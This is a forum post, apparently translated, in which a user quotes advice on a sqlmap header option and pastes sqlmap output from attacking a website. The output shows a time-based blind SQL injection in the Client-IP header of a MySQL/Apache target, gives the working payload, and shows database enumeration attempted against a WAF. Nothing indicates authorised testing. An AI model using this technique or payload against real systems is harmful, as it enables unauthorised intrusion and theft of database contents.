
28.05.2018, 01:58
Originally posted by BabaDook
Possibly it's because of the missing space in --headers='client-ip:*'. Maybe it should have been --headers='client-ip: *'; actually, it should have been. But that's beside the point, one way or another everything works. You did get it going, after all.
Almost. There is some movement in the right direction.
Looks like there's a WAF there (
There are errors; for now it is working through the DB.
Code:
[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further target testing? [y/N]
Thank you, you really helped.